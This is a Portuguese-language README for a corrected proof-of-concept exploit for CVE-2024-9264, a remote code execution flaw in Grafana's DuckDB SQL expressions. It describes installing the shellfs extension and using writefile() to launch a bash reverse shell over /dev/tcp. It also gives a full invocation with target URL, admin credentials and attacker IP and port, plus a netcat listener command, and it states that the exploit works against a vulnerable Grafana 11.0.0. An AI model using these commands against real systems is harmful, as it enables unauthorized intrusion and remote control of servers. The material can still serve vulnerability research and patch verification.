
Exploit de prova de conceito corrigido para CVE-2024-9264, uma RCE crítica no Grafana via expressões SQL do DuckDB. Executa reverse shell usando a extensão shellfs corrigida e a função writefile().
Esta é uma versão corrigida do exploit de prova de conceito para a CVE-2024-9264, uma vulnerabilidade crítica de execução remota de código no Grafana (via expressões SQL e DuckDB).
🔗 Aviso original: Grafana Security Release
❌ PoC original: Quebrado devido a erros de sintaxe e uso incorreto de write_file()
✅ Esta versão funciona, testada em uma instância vulnerável do Grafana 11.0.0.
writefile() em vez de write_file() (função DuckDB)bash -i >& /dev/tcp/...shellfsinstall shellfs from communitypython3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
Depois escute com:
nc -lvnp 4444
Este projeto é apenas para fins educacionais.
Não o utilize contra alvos sem permissão para testar.
Modificado e validado por Exerr — PoC original por z3k0sec.